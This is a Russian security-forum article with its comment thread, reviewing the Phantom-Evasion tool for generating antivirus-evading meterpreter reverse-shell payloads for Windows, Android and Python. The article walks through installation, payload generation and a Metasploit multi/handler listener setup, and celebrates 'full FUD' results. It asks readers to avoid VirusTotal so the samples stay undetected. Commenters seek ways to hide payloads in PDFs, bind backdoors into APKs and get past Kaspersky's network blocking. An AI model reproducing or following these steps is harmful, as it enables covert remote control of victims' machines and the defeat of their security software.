Статья Phantom-evasion FUD payloads

И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ?
Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше.

(Для генерации pyinstaller требуется python 2.7). Основной задачей данного инструмента является генерирование полезной нагрузки с обходом почти АВ почти 100% FUD на сегодняшний день.
Форматы выпуска payloads: exe/elf/apk/dmg
Платформы:
Windows,Linux,Android,Osx,Universal (Platform-Target)
Виды payloads:
  • windows/meterpreter/reverse_tcp for exe
  • linux/x86/meterpreter/reverse_tcp for elf
  • android/meterpreter/reverse_tcp for apk
  • osx/x64/meterpreter/reverse_tcp for dmg
  • python/meterpreter/reverse_tcp in Universal modules
Формат модулей рассмотрим далее. Перейдем к установке. Я буду использовать Kali Linux 2017.3 в виде атакующей машины, Windows Server 2012 R3 и Windows 10 (Build 16299) в виде атакуемой машины.

Вся информация предоставляется в ознакомительных целях. Данная статья описывает последовательность действий и инструменты, с помощью которых злоумышленник может проникнуть в Вашу систему и похитить ваши данные.

Установка :
Код:
git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod +x phantom-evasion.py


Запуск:
Код:
./phantom-evasion.py

Проверка зависимостей
upload_2017-11-26_20-26-44.png


Если все окей, то видим следующую картину:

upload_2017-11-26_20-27-36.png


Посмотреть список всех модулей:

Код:
1 enter

upload_2017-11-26_20-29-27.png


Сегодня я продемонстрирую генерацию полезной нагрузки для Windows, Android. Вернемся в главное меню (0). Выберем список модулей Windows (2)

upload_2017-11-26_20-30-44.png


Пробуем вариант под номер 1

upload_2017-11-26_20-31-40.png


Выберем способ генерации шелкода. Я выбираю с помощью всеми известного msfvenom.

Код:
1 enter
Далее нас просят выбрать тип payload. Я выберу следующий:
Код:
windows/meterpreter/reverse_https
Далее нужно прописать LHOST ( на какой айпишник стучаться)
Код:
ip
Далее нужно прописать LPORT(на какой порт стучаться)
Код:
2222
После выбрать имя файла
ForCodeby
После чего пойдет генерации и компиляция нашего payload. Если все успешно, то в нашей папке будет хранится файл ForCodeby.exe


upload_2017-11-26_20-38-3.png


Проверим работоспособность нашего payload, так же посмотрим результаты на nodistribute.com
Запустим хандлер и будет слушать Ip и порт, который мы указали при генерации payload:

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.102
set LPORT 2222
exploit -j

После запуска на целевом компьютере в процессах появится процесс : ForCodeby.exe

upload_2017-11-26_20-45-37.png


Проверим файл на nodistribute.com



И видим полный FUD!!

upload_2017-11-26_20-49-22.png


Уважительная просьба не лить на VIRUS TOTAL. Дайте полезной нагрузке подышать свежим воздухом< ВЗДОХНУТЬ ГЛОТОК СВОБОДЫ!) Проверяйте хотя бы на сайте, на котором проверил я. От этого будет лучше всем, кроме АВ компаний. Спасибо!

Что ж, хороший старт, давайте создадим еще один с помощью другого способа, тоже для Windows. С использованием абсолютно тех же параметров, которые я указал выше. Я не буду скринить процесс, он ничем не будет отличаться от выше стоящего, за исключением выбора модуля.

Я выбираю:

Код:
[2] Windows MultipathHeapAlloc  (C)

upload_2017-11-26_20-55-3.png


Все, файл создан. Проверим работоспособность. Отправим на атакуемую машину и запустим.

upload_2017-11-26_20-58-22.png



Как видим снова Prof1t! ^_^
Процесс запущен, сессия прилетела. Доступ к командной строке получен =)


Результаты обнаружения тоже радуют глаз.

upload_2017-11-26_21-2-9.png


Что ж, я думаю с виндовс достаточно двух примеров. Сразу хочу сказать что 3-й способ я тоже пробовал
Какой - то Богом забытый что-то нашел, но это не страшно)

Результат :

Также, по просьбе ghostphisher в теме https://codeby.net/threads/uvazhaemye-avtory-tem.61280/ я проверю работоспособность PAYLOAD на Windows 10

ggbMEs7dOyg.jpg


Как видим, профит!

Теперь попробуй сгенерить файлик для анроид. Самому интересно че и как будет :)

В главном меню выберем:
Код:
[5]  List Android modules
Далее выбор не большой)
Код:
[1] Android Droidmare msfvenom-rebuilder (Smali)[/B][/B][/B][/B][/B]
[B][B][B][B][B][1] Obfuscate msf payload

После чего формальности заполнения LHOST and LPORT и выбор payload
Код:
android/meterpreter/reverse_https

PVIon_Ca_bQ.jpg


Собственно видим успешную генерацию PAYLOAD!) Но рано радоваться, надо проверить его работу и обнаружение! Убедительная просьба для тех, у кого есть анроид, проверить АВАСПОМ и dr Web. Почему сам не могу? У меня кирпич под названием "недостаточно памяти" galaxy ace S5830 который вздрагивает каждый раз, когда я беру его в руки. Поэтому я покажу результат обнаружения на нодистр, а внутренним антивирусом телефона не буду прогонять. Так же сейчас нахожусь не дома, поэтому нет виртуального ведроида) Просто запущу пайлоад, чтобы проверить его работу!

Сессия у меня не прилетает, не знаю с чем это связано. Может ведроид мой совсем плох, с помощью Evil-Droid сгенерированный файл отлично отрабатывает. Здесь процесс появился, но никто на порт не стучится. Если кто будет пробовать, отпишитесь о результатах у себя.


Обнаружение:

upload_2017-11-26_21-38-10.png



Теперь попробуем сгенерировать питоновский файл to exe)
Для этого в главном меню выберем 6


upload_2017-11-26_22-4-17.png




upload_2017-11-26_22-7-11.png


Код:
[2] Universal Polymorphic Pyhterpreter (Python)[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR][/B]
[B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000]python/meterpreter/reverse_https

Далее LHOST and LPORT и после предложить сгенерить .ехе, жмем y. Все на выходе появился наш файл.


Проверим его работу на вин 10 с питоном 2.7

upload_2017-11-26_22-11-5.png


После запуска на стороне вин 10 пришла сессия.
Результат скана :

upload_2017-11-26_22-12-46.png



Если подвести итоги, то в целом я получил хорошие впечатления) Вышел он недавно, надеюсь поживет еще. Хотя в версии 0.2 они обещали все обновить еще раз! Надеюсь статья получилось годной, спасибо за внимание, всем Prof1t! =)
 

Вложения

  • upload_2017-11-26_20-36-9.png
    upload_2017-11-26_20-36-9.png
    10,6 КБ · Просмотры: 278
  • upload_2017-11-26_20-58-4.png
    upload_2017-11-26_20-58-4.png
    128,1 КБ · Просмотры: 292
  • upload_2017-11-26_21-30-17.png
    upload_2017-11-26_21-30-17.png
    24,4 КБ · Просмотры: 339
  • upload_2017-11-26_21-30-42.png
    upload_2017-11-26_21-30-42.png
    25,3 КБ · Просмотры: 285
  • upload_2017-11-26_22-10-9.png
    upload_2017-11-26_22-10-9.png
    4,6 КБ · Просмотры: 314
Последнее редактирование модератором:
O

Oddcod3

Hi everybody i've released 0.2 Version of Phantom Evasion with a delay of a couple of weeks due to bug fix
Now you can use Empire one line powershell payload with the module "polymorphic powershell oneline dropper" or drop msfvenom powershell payload and custom powershell payloads with the module "polymorphic powershell script dropper"
[doublepost=1514505146,1514504643][/doublepost]I've modified previous modules implementing new techniques,hardening polymorphism and adding custom multibyte XOR encoder.
Solved bug in 64 bit payload compatibility,
now 64 bit executables are completely FUD
 
O

OneDollar

Пс, ребята, тут обновка прилетела)
Как-то просили мы в комментариях разработчика добавить поддержку полезной нагрузки Powershell, вот он и реализовал в версии 0.2) ну и ещё некоторые интересные обновы для х64 разрядных файликов) проверяйте!)
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
27
Эх,палятся виндовые нагрузки даже после обфускации... Мейл и яндекс сразу отбрасывают,ND показывает 13\39 (( Можно как нибудь упаковать нагрузку в PDF,чтобы не сильно палилась ? )
 
O

OneDollar

Эх,палятся виндовые нагрузки даже после обфускации... Мейл и яндекс сразу отбрасывают,ND показывает 13\39 (( Можно как нибудь упаковать нагрузку в PDF,чтобы не сильно палилась ? )
Когда я пилил обзор.. было все фудным) да вроде все можно, а вот "как", это уже другой вопрос)
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
если вы пользуетесь публичными инструментами то врятли.. рассмотрите варианты загрузки полезной нагрузки из вне, вернее подгрузки.Данная методика часто обсуждалась у нас на форуме...
 
  • Нравится
Реакции: Elektrolife

Elektrolife

Green Team
21.10.2016
208
33
BIT
27
кстати назрел такой вопрос: если проверять файлы стационарным касперским или вебом - всё равно сигнатура сливается в базу ?
 
Z

zipazipa

Пытаюсь сделать апк пэйлоад, но на самой последней стадии слетает: Unable to open 'resigned.apk' as zip archive
Кто сталкивался, какие мысли по этому поводу?
Screenshot from 2018-06-24 01-40-46.png
 
Z

zipazipa

Глюк

Red Team
03.01.2018
1 185
1 879
BIT
187
Пытаюсь сделать апк пэйлоад, но на самой последней стадии слетает: Unable to open 'resigned.apk' as zip archive
Кто сталкивался, какие мысли по этому поводу?
ОТБОЙ! Решено понижением версии явы до 8.
Правильно заданный вопрос уже содержит в себе ответ.... )
 
  • Нравится
Реакции: TROOPY
Z

zipazipa

Новая проблема)
Бэкдор, склеенный с апк-приложением - готово ✔
Оба устройства в одной вай-фай сети - готово ✔
Сессии meterpreter нема :cautious:
На счёт порта есть сомнения, проверял на 2ip - закрыт, но говорят, что это просто потому, что никакое приложение его не слушает.
Открыть с помощью miniupnpc не получается, хотя в настройках роутера функция UPnP включена. Надеюсь, после написания этого поста меня опять осенит:D
Кто что думает?
Screenshot from 2018-06-24 15-57-37.png
 

CHEATER

Green Team
09.09.2017
79
43
BIT
0
Новая проблема)
Бэкдор, склеенный с апк-приложением - готово ✔
Оба устройства в одной вай-фай сети - готово ✔
Сессии meterpreter нема :cautious:
На счёт порта есть сомнения, проверял на 2ip - закрыт, но говорят, что это просто потому, что никакое приложение его не слушает.
Открыть с помощью miniupnpc не получается, хотя в настройках роутера функция UPnP включена. Надеюсь, после написания этого поста меня опять осенит:D
Кто что думает?Посмотреть вложение 19582
Проэксплуатируйте через локальную сеть, если сессия прилетит - проблем с apk нет, тогда думайте, что у вас там с wan. Да и попробуйте обфусцировать без склейки с другим приложением.
 
Z

zipazipa

Проэксплуатируйте через локальную сеть, если сессия прилетит - проблем с apk нет, тогда думайте, что у вас там с wan. Да и попробуйте обфусцировать без склейки с другим приложением.
В локальной сети и делаю, не прилетает(
Без склейки та же история
 
J

Jof

Nod32 тут же съел файл на тестовой машине) штука интересная, конечно, но не панацея.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Мой отсчёт о данной утилите, а именно создании в ней "windows/meterpreter/reverse_tcp".

Когда программа завадала два вопроса, типа делать ли "пэйлоад" максимально не видимым для антивируса, на них на все я отвечал "да". И в продолжении одного из этих пунктов, я выбрал цепочку из трёх файлов, где только третий загружал "полезную нагрузку" (эта цепочка для того что бы антивирусы хуже палили).

"Винда" седьмая/"каперский" с последними обновлениями/включённый "фаервол" - при таких условиях, когда я приказал "касперскому" проверить данный "пэйлоад" на вирусы, он мне сказал "мол вирусов нету сэр" ). Дальше, те три файла которые загружаются, по крайней мере первые 2 из них жрут оперативы около 600-1000 мегабайт, каждый. В моём случае, на машине где всего гиг оперативы и одно ядро процессора - "полезная нагрузка" пыталась быть отправлена только минут через 5-10. Это связанно с тем, что первые два запускаемые программы, нагрузку отправлять и не пытаются, просто запутывают антивирус...

При услоявих, если "касперский" с последними обновлениями включён на полную катушку, то повторюсь - "вируса не находит", но и сессия "метерпретера" не прилетает, максимум пытается отправить файлы "полезной нагрузки". Если же на "касперском" нажать кнопочку "отключть защиту", то сессия "метерпретера" прилетает...

И кстате у меня всё нормально отработало, даже при том, что я не смог победить проблему с этой зависимостью:
[>] Package libc6-dev-i386 [Not Found]

Использовал для этого способа ещё и "BD2.Net Injector", для скрещевания "пэйлоада" абсалютно с любым файлом, но "касперский" "BD2.Net Injector" палит. И дело не в том, что там засунут "пэйлоад" от программы, в честь которой создан топик. Даже если "пэйлоад" скрестить например с видео и чистым установочным "экзэшником", то "касперский" всё равно считает всё это дело вирусом, и безжалостно удаляет... Так вот, к чему я пишу последний параграф ). А потому что хочу попросить у вас альтернативу "BD2.Net Injector", которую бы не полили "антивирусы".
 
Последнее редактирование:

Air7771

Green Team
22.02.2017
100
65
BIT
1
Новая проблема)
Бэкдор, склеенный с апк-приложением - готово ✔
Оба устройства в одной вай-фай сети - готово ✔
Сессии meterpreter нема :cautious:
На счёт порта есть сомнения, проверял на 2ip - закрыт, но говорят, что это просто потому, что никакое приложение его не слушает.
Открыть с помощью miniupnpc не получается, хотя в настройках роутера функция UPnP включена. Надеюсь, после написания этого поста меня опять осенит:D
Кто что думает?Посмотреть вложение 19582
используй no-ip для переброса портов и будет гуд
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Всё классно, всё прекрастно с этой методикой, антивирусы не обнаруживают. Но вот только когда цель активирует данный пэйлоад, то антивирус в данном случае "касперский", блокирует сетевую атаку, тем самым не даёт получить сессию.
Как это обойти?

Короче "касперский" считает этот файл безопастным, а если проверять через сервес, то там 9/35.
Но вопрос который выше - актуален...
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!